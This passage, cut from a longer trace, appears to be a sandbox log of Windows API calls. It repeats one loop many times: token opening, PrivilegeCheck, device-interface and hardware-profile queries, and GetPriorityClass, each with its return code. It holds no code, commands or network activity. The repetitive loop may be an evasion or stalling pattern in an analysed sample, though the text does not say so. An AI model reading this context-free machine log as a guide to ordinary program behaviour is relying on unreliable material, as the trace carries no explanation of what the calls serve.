returned 0xfffffffe [0085.115] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.115] GetLastError () returned 0x3f0 [0085.115] GetCurrentProcess () returned 0xffffffff [0085.115] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.115] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.115] SetLastError (dwErrCode=0x522) [0085.115] CloseHandle (hObject=0x114) returned 1 [0085.115] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.115] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.116] GetLastError () returned 0x578 [0085.116] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.116] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.116] GetCurrentThread () returned 0xfffffffe [0085.116] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.116] GetLastError () returned 0x3f0 [0085.116] GetCurrentProcess () returned 0xffffffff [0085.116] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.116] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.116] SetLastError (dwErrCode=0x522) [0085.116] CloseHandle (hObject=0x114) returned 1 [0085.116] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.116] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.116] GetLastError () returned 0x578 [0085.116] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.116] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.116] GetCurrentThread () returned 0xfffffffe [0085.116] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.116] GetLastError () returned 0x3f0 [0085.116] GetCurrentProcess () returned 0xffffffff [0085.116] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.116] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.116] SetLastError (dwErrCode=0x522) [0085.116] CloseHandle (hObject=0x114) returned 1 [0085.116] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.116] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.116] GetLastError () returned 0x578 [0085.116] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.116] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.116] GetCurrentThread () returned 0xfffffffe [0085.116] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.116] GetLastError () returned 0x3f0 [0085.116] GetCurrentProcess () returned 0xffffffff [0085.116] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.116] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.116] SetLastError (dwErrCode=0x522) [0085.116] CloseHandle (hObject=0x114) returned 1 [0085.116] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.116] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.116] GetLastError () returned 0x578 [0085.116] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.116] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.116] GetCurrentThread () returned 0xfffffffe [0085.116] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.116] GetLastError () returned 0x3f0 [0085.116] GetCurrentProcess () returned 0xffffffff [0085.116] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.117] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.117] SetLastError (dwErrCode=0x522) [0085.117] CloseHandle (hObject=0x114) returned 1 [0085.117] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.117] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.117] GetLastError () returned 0x578 [0085.117] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.117] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.117] GetCurrentThread () returned 0xfffffffe [0085.117] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.117] GetLastError () returned 0x3f0 [0085.117] GetCurrentProcess () returned 0xffffffff [0085.117] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.117] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.117] SetLastError (dwErrCode=0x522) [0085.117] CloseHandle (hObject=0x114) returned 1 [0085.117] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.117] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.117] GetLastError () returned 0x578 [0085.117] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.117] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.117] GetCurrentThread () returned 0xfffffffe [0085.117] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.117] GetLastError () returned 0x3f0 [0085.117] GetCurrentProcess () returned 0xffffffff [0085.117] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.117] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.117] SetLastError (dwErrCode=0x522) [0085.117] CloseHandle (hObject=0x114) returned 1 [0085.117] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.117] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.117] GetLastError () returned 0x578 [0085.117] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.117] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.117] GetCurrentThread () returned 0xfffffffe [0085.117] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.117] GetLastError () returned 0x3f0 [0085.117] GetCurrentProcess () returned 0xffffffff [0085.117] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.117] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.117] SetLastError (dwErrCode=0x522) [0085.117] CloseHandle (hObject=0x114) returned 1 [0085.117] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.117] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.117] GetLastError () returned 0x578 [0085.117] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.118] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.118] GetCurrentThread () returned 0xfffffffe [0085.118] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.118] GetLastError () returned 0x3f0 [0085.118] GetCurrentProcess () returned 0xffffffff [0085.118] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.118] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.118] SetLastError (dwErrCode=0x522) [0085.118] CloseHandle (hObject=0x114) returned 1 [0085.118] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.118] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.118] GetLastError () returned 0x578 [0085.118] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.118] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.118] GetCurrentThread () returned 0xfffffffe [0085.118] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.118] GetLastError () returned 0x3f0 [0085.118] GetCurrentProcess () returned 0xffffffff [0085.118] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.118] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.118] SetLastError (dwErrCode=0x522) [0085.118] CloseHandle (hObject=0x114) returned 1 [0085.118] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.118] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.118] GetLastError () returned 0x578 [0085.118] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.118] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.118] GetCurrentThread () returned 0xfffffffe [0085.118] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.118] GetLastError () returned 0x3f0 [0085.118] GetCurrentProcess () returned 0xffffffff [0085.118] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.118] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.118] SetLastError (dwErrCode=0x522) [0085.118] CloseHandle (hObject=0x114) returned 1 [0085.118] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.118] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.119] GetLastError () returned 0x578 [0085.119] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.119] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.119] GetCurrentThread () returned 0xfffffffe [0085.119] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.119] GetLastError () returned 0x3f0 [0085.119] GetCurrentProcess () returned 0xffffffff [0085.119] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.119] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.119] SetLastError (dwErrCode=0x522) [0085.119] CloseHandle (hObject=0x114) returned 1 [0085.119] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.119] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.119] GetLastError () returned 0x578 [0085.119] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.119] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.119] GetCurrentThread () returned 0xfffffffe [0085.119] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.119] GetLastError () returned 0x3f0 [0085.119] GetCurrentProcess () returned 0xffffffff [0085.119] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.119] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.119] SetLastError (dwErrCode=0x522) [0085.119] CloseHandle (hObject=0x114) returned 1 [0085.119] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.119] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.119] GetLastError () returned 0x578 [0085.119] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.119] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.119] GetCurrentThread () returned 0xfffffffe [0085.119] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.119] GetLastError () returned 0x3f0 [0085.119] GetCurrentProcess () returned 0xffffffff [0085.119] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.119] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.119] SetLastError (dwErrCode=0x522) [0085.120] CloseHandle (hObject=0x114) returned 1 [0085.120] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.120] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.120] GetLastError () returned 0x578 [0085.120] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.120] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.120] GetCurrentThread () returned 0xfffffffe [0085.120] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.120] GetLastError () returned 0x3f0 [0085.120] GetCurrentProcess () returned 0xffffffff [0085.120] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.120] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.120] SetLastError (dwErrCode=0x522) [0085.120] CloseHandle (hObject=0x114) returned 1 [0085.120] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.120] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.120] GetLastError () returned 0x578 [0085.120] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.120] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.120] GetCurrentThread () returned 0xfffffffe [0085.120] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.120] GetLastError () returned 0x3f0 [0085.120] GetCurrentProcess () returned 0xffffffff [0085.120] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.120] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.120] SetLastError (dwErrCode=0x522) [0085.120] CloseHandle (hObject=0x114) returned 1 [0085.120] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.120] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.120] GetLastError () returned 0x578 [0085.120] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.120] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.120] GetCurrentThread () returned 0xfffffffe [0085.120] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.120] GetLastError () returned 0x3f0 [0085.121] GetCurrentProcess () returned 0xffffffff [0085.121] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.121] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.121] SetLastError (dwErrCode=0x522) [0085.121] CloseHandle (hObject=0x114) returned 1 [0085.121] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.121] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.121] GetLastError () returned 0x578 [0085.121] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.121] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.121] GetCurrentThread () returned 0xfffffffe [0085.121] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.121] GetLastError () returned 0x3f0 [0085.121] GetCurrentProcess () returned 0xffffffff [0085.121] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.121] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.121] SetLastError (dwErrCode=0x522) [0085.121] CloseHandle (hObject=0x114) returned 1 [0085.121] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.121] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.121] GetLastError () returned 0x578 [0085.121] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.121] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.121] GetCurrentThread () returned 0xfffffffe [0085.121] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.121] GetLastError () returned 0x3f0 [0085.121] GetCurrentProcess () returned 0xffffffff [0085.121] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.121] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.121] SetLastError (dwErrCode=0x522) [0085.121] CloseHandle (hObject=0x114) returned 1 [0085.121] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.121] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.121] GetLastError () returned 0x578 [0085.121] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.121] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.122] GetCurrentThread () returned 0xfffffffe [0085.122] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.122] GetLastError () returned 0x3f0 [0085.122] GetCurrentProcess () returned 0xffffffff [0085.122] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.122] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.122] SetLastError (dwErrCode=0x522) [0085.122] CloseHandle (hObject=0x114) returned 1 [0085.122] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.122] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.122] GetLastError () returned 0x578 [0085.122] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.122] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.122] GetCurrentThread () returned 0xfffffffe [0085.122] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.122] GetLastError () returned 0x3f0 [0085.122] GetCurrentProcess () returned 0xffffffff [0085.122] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.122] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.122] SetLastError (dwErrCode=0x522) [0085.122] CloseHandle (hObject=0x114) returned 1 [0085.122] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.122] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.122] GetLastError () returned 0x578 [0085.122] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.122] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.122] GetCurrentThread () returned 0xfffffffe [0085.122] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.122] GetLastError () returned 0x3f0 [0085.122] GetCurrentProcess () returned 0xffffffff [0085.122] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.122] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.122] SetLastError (dwErrCode=0x522) [0085.122] CloseHandle (hObject=0x114) returned 1 [0085.122] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.123] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.123] GetLastError () returned 0x578 [0085.123] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.123] GetPriorityClass 